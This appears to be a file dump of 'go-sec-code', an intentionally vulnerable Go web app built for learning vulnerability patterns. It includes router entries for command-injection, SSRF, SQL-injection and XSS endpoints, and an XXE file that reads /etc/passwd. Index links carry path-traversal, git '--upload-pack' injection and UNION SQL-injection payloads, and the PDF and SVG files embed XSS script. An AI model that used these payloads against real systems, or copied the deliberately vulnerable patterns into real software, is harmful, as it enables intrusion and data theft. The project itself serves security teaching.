831 | modernc.org/libc v1.11.6/go.mod h1:ddqmzR6p5i4jIGK1d/EiSw97LBcE3dK24QEwCFvgNgE=
832 | modernc.org/libc v1.11.11/go.mod h1:lXEp9QOOk4qAYOtL3BmMve99S5Owz7Qyowzvg6LiZso=
833 | modernc.org/libc v1.11.13/go.mod h1:ZYawJWlXIzXy2Pzghaf7YfM8OKacP3eZQI81PDLFdY8=
834 | modernc.org/libc v1.11.16/go.mod h1:+DJquzYi+DMRUtWI1YNxrlQO6TcA5+dRRiq8HWBWRC8=
835 | modernc.org/libc v1.11.19/go.mod h1:e0dgEame6mkydy19KKaVPBeEnyJB4LGNb0bBH1EtQ3I=
836 | modernc.org/libc v1.11.24/go.mod h1:FOSzE0UwookyT1TtCJrRkvsOrX2k38HoInhw+cSCUGk=
837 | modernc.org/libc v1.11.26/go.mod h1:SFjnYi9OSd2W7f4ct622o/PAYqk7KHv6GS8NZULIjKY=
838 | modernc.org/libc v1.11.27/go.mod h1:zmWm6kcFXt/jpzeCgfvUNswM0qke8qVwxqZrnddlDiE=
839 | modernc.org/libc v1.11.28/go.mod h1:Ii4V0fTFcbq3qrv3CNn+OGHAvzqMBvC7dBNyC4vHZlg=
840 | modernc.org/libc v1.11.31/go.mod h1:FpBncUkEAtopRNJj8aRo29qUiyx5AvAlAxzlx9GNaVM=
841 | modernc.org/libc v1.11.34/go.mod h1:+Tzc4hnb1iaX/SKAutJmfzES6awxfU1BPvrrJO0pYLg=
842 | modernc.org/libc v1.11.37/go.mod h1:dCQebOwoO1046yTrfUE5nX1f3YpGZQKNcITUYWlrAWo=
843 | modernc.org/libc v1.11.39/go.mod h1:mV8lJMo2S5A31uD0k1cMu7vrJbSA3J3waQJxpV4iqx8=
844 | modernc.org/libc v1.11.42/go.mod h1:yzrLDU+sSjLE+D4bIhS7q1L5UwXDOw99PLSX0BlZvSQ=
845 | modernc.org/libc v1.11.44/go.mod h1:KFq33jsma7F5WXiYelU8quMJasCCTnHK0mkri4yPHgA=
846 | modernc.org/libc v1.11.45/go.mod h1:Y192orvfVQQYFzCNsn+Xt0Hxt4DiO4USpLNXBlXg/tM=
847 | modernc.org/libc v1.11.47/go.mod h1:tPkE4PzCTW27E6AIKIR5IwHAQKCAtudEIeAV1/SiyBg=
848 | modernc.org/libc v1.11.49/go.mod h1:9JrJuK5WTtoTWIFQ7QjX2Mb/bagYdZdscI3xrvHbXjE=
849 | modernc.org/libc v1.11.51/go.mod h1:R9I8u9TS+meaWLdbfQhq2kFknTW0O3aw3kEMqDDxMaM=
850 | modernc.org/libc v1.11.53/go.mod h1:5ip5vWYPAoMulkQ5XlSJTy12Sz5U6blOQiYasilVPsU=
851 | modernc.org/libc v1.11.54/go.mod h1:S/FVnskbzVUrjfBqlGFIPA5m7UwB3n9fojHhCNfSsnw=
852 | modernc.org/libc v1.11.55/go.mod h1:j2A5YBRm6HjNkoSs/fzZrSxCuwWqcMYTDPLNx0URn3M=
853 | modernc.org/libc v1.11.56/go.mod h1:pakHkg5JdMLt2OgRadpPOTnyRXm/uzu+Yyg/LSLdi18=
854 | modernc.org/libc v1.11.58/go.mod h1:ns94Rxv0OWyoQrDqMFfWwka2BcaF6/61CqJRK9LP7S8=
855 | modernc.org/libc v1.11.70/go.mod h1:DUOmMYe+IvKi9n6Mycyx3DbjfzSKrdr/0Vgt3j7P5gw=
856 | modernc.org/libc v1.11.71/go.mod h1:DUOmMYe+IvKi9n6Mycyx3DbjfzSKrdr/0Vgt3j7P5gw=
857 | modernc.org/libc v1.11.75/go.mod h1:dGRVugT6edz361wmD9gk6ax1AbDSe0x5vji0dGJiPT0=
858 | modernc.org/libc v1.11.82/go.mod h1:NF+Ek1BOl2jeC7lw3a7Jj5PWyHPwWD4aq3wVKxqV1fI=
859 | modernc.org/libc v1.11.86/go.mod h1:ePuYgoQLmvxdNT06RpGnaDKJmDNEkV7ZPKI2jnsvZoE=
860 | modernc.org/libc v1.11.87/go.mod h1:Qvd5iXTeLhI5PS0XSyqMY99282y+3euapQFxM7jYnpY=
861 | modernc.org/libc v1.22.2 h1:4U7v51GyhlWqQmwCHj28Rdq2Yzwk55ovjFrdPjs8Hb0=
862 | modernc.org/libc v1.22.2/go.mod h1:uvQavJ1pZ0hIoC/jfqNoMLURIMhKzINIWypNM17puug=
863 | modernc.org/mathutil v1.1.1/go.mod h1:mZW8CKdRPY1v87qxC/wUdX5O1qDzXMP5TH3wjfpga6E=
864 | modernc.org/mathutil v1.2.2/go.mod h1:mZW8CKdRPY1v87qxC/wUdX5O1qDzXMP5TH3wjfpga6E=
865 | modernc.org/mathutil v1.4.0/go.mod h1:mZW8CKdRPY1v87qxC/wUdX5O1qDzXMP5TH3wjfpga6E=
866 | modernc.org/mathutil v1.4.1/go.mod h1:mZW8CKdRPY1v87qxC/wUdX5O1qDzXMP5TH3wjfpga6E=
867 | modernc.org/mathutil v1.5.0 h1:rV0Ko/6SfM+8G+yKiyI830l3Wuz1zRutdslNoQ0kfiQ=
868 | modernc.org/mathutil v1.5.0/go.mod h1:mZW8CKdRPY1v87qxC/wUdX5O1qDzXMP5TH3wjfpga6E=
869 | modernc.org/memory v1.0.4/go.mod h1:nV2OApxradM3/OVbs2/0OsP6nPfakXpi50C7dcoHXlc=
870 | modernc.org/memory v1.0.5/go.mod h1:B7OYswTRnfGg+4tDH1t1OeUNnsy2viGTdME4tzd+IjM=
871 | modernc.org/memory v1.5.0 h1:N+/8c5rE6EqugZwHii4IFsaJ7MUhoWX07J5tC/iI5Ds=
872 | modernc.org/memory v1.5.0/go.mod h1:PkUhL0Mugw21sHPeskwZW4D6VscE/GQJOnIpCnW6pSU=
873 | modernc.org/opt v0.1.1/go.mod h1:WdSiB5evDcignE70guQKxYUl14mgWtbClRi5wmkkTX0=
874 | modernc.org/opt v0.1.3 h1:3XOZf2yznlhC+ibLltsDGzABUGVx8J6pnFMS3E4dcq4=
875 | modernc.org/opt v0.1.3/go.mod h1:WdSiB5evDcignE70guQKxYUl14mgWtbClRi5wmkkTX0=
876 | modernc.org/sqlite v1.14.2/go.mod h1:yqfn85u8wVOE6ub5UT8VI9JjhrwBUUCNyTACN0h6Sx8=
877 | modernc.org/sqlite v1.18.2 h1:S2uFiaNPd/vTAP/4EmyY8Qe2Quzu26A2L1e25xRNTio=
878 | modernc.org/sqlite v1.18.2/go.mod h1:kvrTLEWgxUcHa2GfHBQtanR1H9ht3hTJNtKpzH9k1u0=
879 | modernc.org/strutil v1.1.1/go.mod h1:DE+MQQ/hjKBZS2zNInV5hhcipt5rLPWkmpbGeW5mmdw=
880 | modernc.org/strutil v1.1.3 h1:fNMm+oJklMGYfU9Ylcywl0CO5O6nTfaowNsh2wpPjzY=
881 | modernc.org/strutil v1.1.3/go.mod h1:MEHNA7PdEnEwLvspRMtWTNnp2nnyvMfkimT1NKNAGbw=
882 | modernc.org/tcl v1.8.13/go.mod h1:V+q/Ef0IJaNUSECieLU4o+8IScapxnMyFV6i/7uQlAY=
883 | modernc.org/token v1.0.0/go.mod h1:UGzOrNV1mAFSEB63lOFHIpNRUVMvYTc6yu1SMY/XTDM=
884 | modernc.org/token v1.1.0 h1:Xl7Ap9dKaEs5kLoOQeQmPWevfnk/DM5qcLcYlA8ys6Y=
885 | modernc.org/token v1.1.0/go.mod h1:UGzOrNV1mAFSEB63lOFHIpNRUVMvYTc6yu1SMY/XTDM=
886 | modernc.org/z v1.2.19/go.mod h1:+ZpP0pc4zz97eukOzW3xagV/lS82IpPN9NGG5pNF9vY=
887 | nhooyr.io/websocket v1.8.10 h1:mv4p+MnGrLDcPlBoWsvPP7XCzTYMXP9F9eIGoKbgx7Q=
888 | nhooyr.io/websocket v1.8.10/go.mod h1:rN9OFWIUwuxg4fR5tELlYC04bXYowCP9GX47ivo2l+c=
889 | sigs.k8s.io/yaml v1.1.0/go.mod h1:UJmg0vDUVViEyp3mgSv9WPwZCDxu4rQW1olrI1uml+o=
890 | sourcegraph.com/sourcegraph/appdash v0.0.0-20190731080439-ebfcffb1b5c0/go.mod h1:hI742Nqp5OhwiqlzhgfbWU4mW4yO10fP+LoT9WOswdU=
891 | xorm.io/builder v0.3.9 h1:Sd65/LdWyO7LR8+Cbd+e7mm3sK/7U9k0jS3999IDHMc=
892 | xorm.io/builder v0.3.9/go.mod h1:aUW0S9eb9VCaPohFCH3j7czOx1PMW3i1HrSzbLYGBSE=
893 | xorm.io/xorm v1.3.0 h1:UsVke0wyAk3tJcb0j15gLWv2DEshVUnySVyvcYDny8w=
894 | xorm.io/xorm v1.3.0/go.mod h1:cEaWjDPqoIusTkmDAG+krCcPcTglqo8CDU8geX/yhko=
895 | 


--------------------------------------------------------------------------------
/main.go:
--------------------------------------------------------------------------------
 1 | package main
 2 | 
 3 | import (
 4 | 	_ "go-sec-code/routers"
 5 | 	beego "github.com/beego/beego/v2/server/web"
 6 | )
 7 | 
 8 | func main() {
 9 | 	beego.Run()
10 | }
11 | 
12 | 


--------------------------------------------------------------------------------
/models/user.go:
--------------------------------------------------------------------------------
 1 | package models
 2 | 
 3 | import (
 4 | 	"database/sql"
 5 | 
 6 | 	"github.com/beego/beego/v2/client/orm"
 7 | )
 8 | 
 9 | func init() {
10 | 	// 需要在init中注册定义的model
11 | 	orm.RegisterModel(new(User))
12 | }
13 | 
14 | type User struct {
15 | 	Id       int            `json:"id"`
16 | 	Username sql.NullString `json:"username"`
17 | 	Password sql.NullString `json:"password"`
18 | }
19 | 


--------------------------------------------------------------------------------
/routers/router.go:
--------------------------------------------------------------------------------
 1 | package routers
 2 | 
 3 | import (
 4 | 	"go-sec-code/controllers"
 5 | 
 6 | 	beego "github.com/beego/beego/v2/server/web"
 7 | )
 8 | 
 9 | func init() {
10 | 	beego.Router("/", &controllers.MainController{})
11 | 	beego.Router("/favicon.ico", &controllers.FaviconController{})
12 | 	beego.Router("/commandInject/vuln", &controllers.CommandInjectVuln1Controller{})
13 | 	beego.Router("/commandInject/vuln/host", &controllers.CommandInjectVuln2Controller{})
14 | 	beego.Router("/commandInject/vuln/git", &controllers.CommandInjectVuln3Controller{})
15 | 	beego.Router("/commandInject/safe", &controllers.CommandInjectSafe1Controller{})
16 | 	beego.Router("/CommandInject/vuln/other_git", &controllers.CommandInjectVulnGitController{})
17 | 	beego.Router("/CommandInject/vuln/os", &controllers.CommandInjectVuln4Controller{})
18 | 	beego.Router("/CommandInject/vuln/ssh", &controllers.CommandInjectVuln5Controller{})
19 | 	beego.Router("/CommandInject/vuln/sh", &controllers.CommandInjectVuln6Controller{})
20 | 	beego.Router("/CommandInject/vuln/syscall", &controllers.CommandInjectVuln7Controller{})
21 | 	beego.Router("/CommandInject/vuln/otto", &controllers.CommandInjectVuln8Controller{})
22 | 	beego.Router("/cors/vuln/reflect", &controllers.CorsVuln1Controller{})
23 | 	beego.Router("/cors/vuln/any-origin-with-credential", &controllers.CorsVuln2Controller{})
24 | 	beego.Router("/cors/safe", &controllers.CorsSafe1Controller{})
25 | 	beego.Router("/crlfInjection/safe", &controllers.CRLFSafe1Controller{})
26 | 	beego.Router("/fileUpload/vuln", &controllers.FileUploadVuln1Controller{})
27 | 	beego.Router("/fileUpload/safe", &controllers.FileUploadSafe1Controller{})
28 | 	beego.Router("/jsonp/vuln/noCheck", &controllers.JsonpVuln1Controller{})
29 | 	beego.Router("/jsonp/vuln/emptyReferer", &controllers.JsonpVuln1Controller{})
30 | 	beego.Router("/jsonp/safe", &controllers.JsonpSafe1Controller{})
31 | 	beego.Router("/pathTraversal/vuln", &controllers.PathTraversalVuln1Controller{})
32 | 	beego.Router("/pathTraversal/vuln/clean", &controllers.PathTraversalVuln2Controller{})
33 | 	beego.Router("/pathTraversal/vuln/open", &controllers.PathTraversalVuln3Controller{})
34 | 	beego.Router("/pathTraversal/safe/filter", &controllers.PathTraversalSafe1Controller{})
35 | 	beego.Router("/pathTraversal/safe/check", &controllers.PathTraversalSafe2Controller{})
36 | 	beego.Router("/sqlInjection/native/vuln/integer", &controllers.SqlInjectionVuln1Controller{})
37 | 	beego.Router("/sqlInjection/native/vuln/string", &controllers.SqlInjectionVuln2Controller{})
38 | 	beego.Router("/sqlInjection/orm/vuln/xorm", &controllers.SqlInjectionVuln3Controller{})
39 | 	beego.Router("/sqlInjection/generator/vuln/squirrel", &controllers.SqlInjectionVuln4Controller{})
40 | 	beego.Router("/sqlInjection/generator/vuln/bun", &controllers.SqlInjectionVuln5Controller{})
41 | 	beego.Router("/sqlInjection/generator/vuln/gorm", &controllers.SqlInjectionVuln6Controller{})
42 | 	beego.Router("/sqlInjection/generator/vuln/sqlx", &controllers.SqlInjectionVuln7Controller{})
43 | 	beego.Router("/sqlInjection/generator/vuln/gf", &controllers.SqlInjectionVuln8Controller{})
44 | 	beego.Router("/sqlInjection/native/safe/integer", &controllers.SqlInjectionSafe1Controller{})
45 | 	beego.Router("/sqlInjection/native/safe/string", &controllers.SqlInjectionSafe2Controller{})
46 | 	beego.Router("/sqlInjection/orm/safe/beego", &controllers.SqlInjectionSafe3Controller{})
47 | 	beego.Router("/ssrf/vuln", &controllers.SSRFVuln1Controller{})
48 | 	beego.Router("/ssrf/vuln/obfuscation", &controllers.SSRFVuln2Controller{})
49 | 	beego.Router("/ssrf/vuln/302", &controllers.SSRFVuln3Controller{})
50 | 	beego.Router("/ssrf/vuln/websocket", &controllers.SSRFVulnXWebsocketController{})
51 | 	beego.Router("/ssrf/vuln/nhooyr_websocket", &controllers.SSRFVulnnhooyrWebsocketController{})
52 | 	beego.Router("/ssrf/vuln/gorilla_websocket", &controllers.SSRFVulngorillaWebsocketController{})
53 | 	beego.Router("/ssrf/safe/websocket", &controllers.SSRFSafeXWebsocketController{})
54 | 	beego.Router("/ssrf/safe/whitelists", &controllers.SSRFSafe1Controller{})
55 | 	beego.Router("/ssti/vuln", &controllers.SSTIVuln1Controller{})
56 | 	beego.Router("/ssti/vuln2", &controllers.SSTIVuln2Controller{})
57 | 	beego.Router("/ssti/safe", &controllers.SSTISafe1Controller{})
58 | 	beego.Router("/ssti/safe2", &controllers.SSTISafe2Controller{})
59 | 	beego.Router("/xss/vuln", &controllers.XSSVuln1Controller{})
60 | 	beego.Router("/xss/vuln/store", &controllers.XSSVuln2Controller{})
61 | 	beego.Router("/xss/vuln/svg", &controllers.XSSVuln3Controller{})
62 | 	beego.Router("/xss/vuln/pdf", &controllers.XSSVuln4Controller{})
63 | 	beego.Router("/xss/safe", &controllers.XSSSafe1Controller{})
64 | 	beego.Router("/xss/safe/svg", &controllers.XSSSafe2Controller{})
65 | 	beego.Router("/xxe/vuln", &controllers.XXEVuln1Controller{})
66 | 	beego.Router("/xxe/safe", &controllers.XXESafe1Controller{})
67 | 	beego.Router("/zipslip/vuln", &controllers.ZipSlipVuln1Controller{})
68 | 	beego.Router("/tarslip/vuln", &controllers.TarSlipVuln1Controller{})
69 | 	beego.Router("/OpenUrlRedict/vuln", &controllers.OpenUrlRedictVulnController{})
70 | 	beego.Router("/OpenUrlRedict/safe", &controllers.OpenUrlRedictSafeController{})
71 | 	beego.Router("/NosqlInjection/native/vuln", &controllers.NoSqlInjectionVulnController{})
72 | }
73 | 


--------------------------------------------------------------------------------
/static/untar/malicious_link:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/pricklyglobe/GoSecCode-codeql/24bc3df3f6ff118e9c8a5537869ef482b736ce35/static/untar/malicious_link


--------------------------------------------------------------------------------
/static/xml/xxe.xml:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8"?>
2 | <!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
3 | <root>&xxe;</root>


--------------------------------------------------------------------------------
/static/xss/poc.pdf:
--------------------------------------------------------------------------------
 1 | %PDF-1.3
 2 | %����
 3 | 1 0 obj
 4 | <</Pages 2 0 R /Type /Catalog>>
 5 | endobj
 6 | 2 0 obj
 7 | <</Count 1 /Kids [3 0 R] /Type /Pages>>
 8 | endobj
 9 | 3 0 obj
10 | <</AA
11 |   <</O
12 |   <</JS
13 |   (
14 | try {
15 |   app.alert\("XSS"\)
16 | } catch \(e\) {
17 |   app.alert\(e.message\);
18 | }
19 |     ) 
20 |   /S /JavaScript>>>>
21 |   /Annots [] /Contents 4 0 R /MediaBox [0 0 612 792] /Parent 2 0 R
22 |   /Resources
23 |   <</Font <</F1 <</BaseFont /Helvetica /Subtype /Type1 /Type /Font>>>>>>
24 |   /Type /Page>>
25 | endobj
26 | 4 0 obj
27 | <</Length 21>>
28 | stream
29 |  
30 | BT
31 | /F1 24 Tf
32 | ET
33 |     
34 | endstream
35 | endobj
36 | xref
37 | 0 5
38 | 0000000000 65535 f
39 | 0000000015 00000 n
40 | 0000000062 00000 n
41 | 0000000117 00000 n
42 | 0000000424 00000 n
43 | trailer
44 | 
45 | <</Root 1 0 R /Size 5>>
46 | startxref
47 | 493
48 | %%EOF
49 | 


--------------------------------------------------------------------------------
/static/xss/poc.svg:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="UTF-8" standalone="no"?>
2 | <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
3 | <svg version="1.1" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" width="100px" height="100px" viewBox="0 0 751 751" enable-background="new 0 0 751 751" xml:space="preserve">  
4 | <rect x="0" y="0" width="100" height="100" />
5 | <script>alert(1)</script>
6 | </svg>


--------------------------------------------------------------------------------
/utils/gogs.go:
--------------------------------------------------------------------------------
 1 | package utils
 2 | 
 3 | import (
 4 | 	"fmt"
 5 | 	"net"
 6 | )
 7 | 
 8 | var localCIDRs []*net.IPNet
 9 | 
10 | func init() {
11 | 	// Parsing hardcoded CIDR strings should never fail, if in case it does, let's
12 | 	// fail it at start.
13 | 	rawCIDRs := []string{
14 | 		// https://datatracker.ietf.org/doc/html/rfc5735:
15 | 		"127.0.0.0/8",        // Loopback
16 | 		"0.0.0.0/8",          // "This" network
17 | 		"100.64.0.0/10",      // Shared address space
18 | 		"169.254.0.0/16",     // Link local
19 | 		"172.16.0.0/12",      // Private-use networks
20 | 		"192.0.0.0/24",       // IETF Protocol assignments
21 | 		"192.0.2.0/24",       // TEST-NET-1
22 | 		"192.88.99.0/24",     // 6to4 Relay anycast
23 | 		"192.168.0.0/16",     // Private-use networks
24 | 		"198.18.0.0/15",      // Network interconnect
25 | 		"198.51.100.0/24",    // TEST-NET-2
26 | 		"203.0.113.0/24",     // TEST-NET-3
27 | 		"255.255.255.255/32", // Limited broadcast
28 | 
29 | 		// https://datatracker.ietf.org/doc/html/rfc1918:
30 | 		"10.0.0.0/8", // Private-use networks
31 | 
32 | 		// https://datatracker.ietf.org/doc/html/rfc6890:
33 | 		"::1/128",   // Loopback
34 | 		"FC00::/7",  // Unique local address
35 | 		"FE80::/10", // Multicast address
36 | 	}
37 | 	for _, raw := range rawCIDRs {
38 | 		_, cidr, err := net.ParseCIDR(raw)
39 | 		if err != nil {
40 | 			panic(fmt.Sprintf("parse CIDR %q: %v", raw, err))
41 | 		}
42 | 		localCIDRs = append(localCIDRs, cidr)
43 | 	}
44 | }
45 | 
46 | func IsLocalHostname(hostname string, allowlist []string) bool {
47 | 	for _, allow := range allowlist {
48 | 		if hostname == allow {
49 | 			return false
50 | 		}
51 | 	}
52 | 
53 | 	ips, err := net.LookupIP(hostname)
54 | 	if err != nil {
55 | 		return true
56 | 	}
57 | 	for _, ip := range ips {
58 | 		for _, cidr := range localCIDRs {
59 | 			if cidr.Contains(ip) {
60 | 				return true
61 | 			}
62 | 		}
63 | 	}
64 | 	return false
65 | }
66 | 


--------------------------------------------------------------------------------
/utils/securityUtils.go:
--------------------------------------------------------------------------------
  1 | package utils
  2 | 
  3 | import (
  4 | 	"net/url"
  5 | 	"regexp"
  6 | 	"strings"
  7 | )
  8 | 
  9 | type CommandInjectFilter struct {
 10 | }
 11 | 
 12 | type CorsFilter struct {
 13 | }
 14 | 
 15 | type FileUploadFilter struct {
 16 | }
 17 | 
 18 | type JsonpFilter struct {
 19 | }
 20 | 
 21 | type PathTraversalFilter struct {
 22 | }
 23 | 
 24 | type SSRFFilter struct {
 25 | }
 26 | 
 27 | type XSSFilter struct {
 28 | }
 29 | 
 30 | func (c *CommandInjectFilter) DoFilter(input string) bool {
 31 | 	r, _ := regexp.Compile(`^[a-zA-Z0-9_/\.-]+$`)
 32 | 	return r.MatchString(input)
 33 | }
 34 | 
 35 | func (c *CorsFilter) DoFilter(input string, whitelists []string) bool {
 36 | 	for _, v := range whitelists {
 37 | 		if strings.HasSuffix(input, "."+v) || input == v {
 38 | 			return true
 39 | 		}
 40 | 	}
 41 | 	return false
 42 | }
 43 | 
 44 | func (c *FileUploadFilter) DoFilter(input string) bool {
 45 | 	r, _ := regexp.Compile(`\.\./`)
 46 | 	return r.MatchString(input)
 47 | }
 48 | 
 49 | func (c *JsonpFilter) DoFilter(input string, whitelists []string) bool {
 50 | 	u, err := url.Parse(input)
 51 | 	if err != nil {
 52 | 		panic(err)
 53 | 	}
 54 | 	for _, v := range whitelists {
 55 | 		if strings.HasSuffix(u.Host, "."+v) || input == v {
 56 | 			return true
 57 | 		}
 58 | 	}
 59 | 	return false
 60 | }
 61 | 
 62 | func (c *PathTraversalFilter) DoFilter(input string) bool {
 63 | 	r, _ := regexp.Compile(`\.\.`)
 64 | 	return r.MatchString(input) || strings.HasPrefix(input, "/")
 65 | }
 66 | 
 67 | func (c *SSRFFilter) DoBlackFilter(input string, blacklists []string) bool {
 68 | 	u, err := url.Parse(input)
 69 | 	if err != nil {
 70 | 		panic(err)
 71 | 	}
 72 | 	for _, v := range blacklists {
 73 | 		if strings.HasSuffix(u.Hostname(), v) {
 74 | 			return true
 75 | 		}
 76 | 	}
 77 | 	return false
 78 | }
 79 | 
 80 | func (c *SSRFFilter) DoWhiteFilter(input string, whitelists []string) bool {
 81 | 	u, err := url.Parse(input)
 82 | 	if err != nil {
 83 | 		panic(err)
 84 | 	}
 85 | 	//exclude evil-example.com
 86 | 	if strings.HasPrefix(u.Hostname(), ".") {
 87 | 		for _, v := range whitelists {
 88 | 			if strings.HasSuffix(u.Hostname(), v) {
 89 | 				return false
 90 | 			}
 91 | 		}
 92 | 	} else {
 93 | 		for _, v := range whitelists {
 94 | 			if u.Hostname() == v {
 95 | 				return false
 96 | 			}
 97 | 		}
 98 | 	}
 99 | 	return true
100 | }
101 | 
102 | // this filter comes from fix of cve-2022-0870 gogs SSRF
103 | func (c *SSRFFilter) DoGogsFilter(input string) bool {
104 | 	return IsLocalHostname(input, nil)
105 | }
106 | 
107 | func (c *XSSFilter) DoFilter(input string) string {
108 | 	mid := strings.ReplaceAll(input, "&", "&amp;")
109 | 	mid = strings.ReplaceAll(mid, "<", "&lt;")
110 | 	mid = strings.ReplaceAll(mid, ">", "&gt;")
111 | 	mid = strings.ReplaceAll(mid, "\"", "&quot;")
112 | 	mid = strings.ReplaceAll(mid, "'", "&#x27")
113 | 	output := strings.ReplaceAll(mid, "/", "&#x2F")
114 | 	return output
115 | }
116 | 


--------------------------------------------------------------------------------
/views/fileUpload.tpl:
--------------------------------------------------------------------------------
 1 | <!DOCTYPE html>
 2 | <html>
 3 | <head>
 4 |   <title>GO-SEC-CODE</title>
 5 |   <meta charset="utf-8">
 6 |   <meta name="viewport" content="width=device-width, initial-scale=1">
 7 |   <link href="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/css/bootstrap.min.css" rel="stylesheet">
 8 |   <script src="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/js/bootstrap.bundle.min.js"></script>
 9 | </head>
10 | <body>
11 |     <div class="container-fluid p-5 bg-primary text-white text-center">
12 |         <h1>GO-SEC-CODE</h1>
13 |         <a href="/" style="color: white;">back to home</a>
14 |     </div>
15 |     <form class="container" method="post" enctype="multipart/form-data">
16 |         <div class="mb-3">
17 |             <label for="formFile" class="form-label">Choose file to upload</label>
18 |             <input class="form-control" type="file" id="formFile" name="file">
19 |         </div>
20 |         <input type="hidden" name=userid value="233">
21 |         <button type="submit" class="btn btn-primary">Submit</button>
22 |     </form>
23 |     <div class="container mt-5">
24 |         <h4>{{.savePath}}</h4>
25 |     </div>
26 |   </body>


--------------------------------------------------------------------------------
/views/index.tpl:
--------------------------------------------------------------------------------
  1 | <!DOCTYPE html>
  2 | <html>
  3 | <head>
  4 |   <title>GO-SEC-CODE</title>
  5 |   <meta charset="utf-8">
  6 |   <meta name="viewport" content="width=device-width, initial-scale=1">
  7 |   <link href="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/css/bootstrap.min.css" rel="stylesheet">
  8 |   <script src="https://cdn.staticfile.org/twitter-bootstrap/5.1.1/js/bootstrap.bundle.min.js"></script>
  9 | </head>
 10 | <body>
 11 | 
 12 | <div class="container-fluid p-5 bg-primary text-white text-center">
 13 |   <h1>GO-SEC-CODE</h1>
 14 |   <p>Go-sec-code is a  project for learning Go vulnerability code.</p> 
 15 | </div>
 16 |   
 17 | <div class="container mt-4">
 18 |   <div class="row">
 19 |     <div class="col-sm-4">
 20 |       <h3>CommandInject</h3>
 21 |       <h4><a href="/commandInject/vuln?dir=%2F">vuln:unchecked get param</a></h4>
 22 |       <h4><a href="/commandInject/vuln/host">vuln:unchecked host</a></h4>
 23 |       <h4><a href="/commandInject/vuln/git?repoUrl=--upload-pack=$(open /)">vuln:unchecked git param</a></h4>
 24 |       <h4><a href="/CommandInject/vuln/other_git?dir=--upload-pack=$(open /)">vuln:unchecked other git param</a></h4>
 25 |       <h4><a href="/CommandInject/vuln/os?dir=open%20/">vuln:os</a></h4>
 26 |       <h4><a href="/CommandInject/vuln/ssh">vuln:ssh</a></h4>
 27 |       <h4><a href="/CommandInject/vuln/sh?dir=open%20/">vuln:sh</a></h4>
 28 |       <h4><a href="/CommandInject/vuln/syscall">vuln:syscall</a></h4>
 29 |       <h4><a href="/CommandInject/vuln/otto?dir=whoami">vuln:otto</a></h4>
 30 |       <h4><a href="/commandInject/safe?dir=.%3Bwhoami">safe:filter</a></h4>
 31 |     </div>
 32 |     <div class="col-sm-4">
 33 |       <h3>Cors</h3>
 34 |       <h4><a href="/cors/vuln/reflect">vuln:reflect</a></h4>
 35 |       <h4><a href="/cors/vuln/any-origin-with-credential">vuln:any-origin-with-credential</a></h4>
 36 |       <h4><a href="/cors/safe">safe:whilelist</a></h4>
 37 |     </div>
 38 |     <div class="col-sm-4">
 39 |       <h3>CRLFInjection</h3>        
 40 |       <h4><a href=/crlfInjection/safe?header>safe:unexploitable</a></h4>
 41 |     </div>
 42 |   </div>
 43 |   <div class="row">
 44 |     <div class="col-sm-4">
 45 |       <h3>FileUpload</h3>
 46 |       <h4><a href=/fileUpload/vuln>vuln:unchecked post param</a></h4>
 47 |       <h4><a href=/fileUpload/safe>safe:filter</a></h4>
 48 |     </div>
 49 |     <div class="col-sm-4">
 50 |       <h3>JSONP</h3>        
 51 |       <h4><a href="/jsonp/vuln/noCheck?callback=jsonp">vuln:unchecked host</a></h4>
 52 |       <h4><a href="/jsonp/vuln/emptyReferer?callback=jsonp">vuln:empty referer bypass</a></h4>
 53 |       <h4><a href="/jsonp/safe?callback=jsonp">safe:whitelist</a></h4>
 54 |     </div>
 55 |     <div class="col-sm-4">
 56 |       <h3>PathTraversal</h3>        
 57 |       <h4><a href="/pathTraversal/vuln?file=../../../../../../../etc/passwd">vuln:unchecked get param</a></h4>
 58 |       <h4><a href="/pathTraversal/vuln/clean?file=../../../../../../../etc/passwd">vuln:use Clean() improperly</a></h4>
 59 |       <h4><a href="/pathTraversal/vuln/open?file=../../../../../../../etc/passwd">vuln:open</a></h4>
 60 |       <h4><a href="/pathTraversal/safe/filter?file=../../../../../../../etc/passwd">safe:filter</a></h4>
 61 |       <h4><a href="/pathTraversal/safe/check?file=../../../../../../../etc/passwd">safe:check</a></h4>
 62 |     </div>
 63 |   </div>
 64 |   <div class="row">
 65 |     <div class="col-sm-4">
 66 |       <h3>SQLInjection</h3>
 67 |       <h4><a href="/sqlInjection/native/vuln/integer?id=1">vuln:integer</a></h4>
 68 |       <h4><a href="/sqlInjection/native/vuln/string?username=admin">vuln:string</a></h4>
 69 |       <h4><a href="/sqlInjection/orm/vuln/xorm?field=username&username=admin">vuln:use orm improperly</a></h4>
 70 |       <h4><a href="/sqlInjection/generator/vuln/squirrel?order=id&username=admin">vuln:use generator improperly</a></h4>
 71 |       <h4><a href="/sqlInjection/generator/vuln/bun?username=admin'%20UNION%20ALL%20SELECT%20NULL%2CCONCAT(0x717a707071%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x71716a6271)%2CNULL--%20-">vuln:bun</a></h4>
 72 |       <h4><a href="/sqlInjection/generator/vuln/gorm?username=admin'%20UNION%20ALL%20SELECT%20NULL%2CCONCAT(0x717a707071%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x71716a6271)%2CNULL--%20-">vuln:gorm</a></h4>
 73 |       <h4><a href="/sqlInjection/generator/vuln/sqlx?username=admin'%20UNION%20ALL%20SELECT%20CONCAT(0x716a767671%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x717a6b6271)%2CNULL%2CNULL--%20-">vuln:sqlx</a></h4>
 74 |       <h4><a href="/sqlInjection/generator/vuln/gf?username=admin'%20UNION%20ALL%20SELECT%20CONCAT(0x716a767671%2CIFNULL(CAST(CURRENT_USER()%20AS%20CHAR)%2C0x20)%2C0x717a6b6271)%2CNULL%2CNULL--%20-">vuln:gf</a></h4>
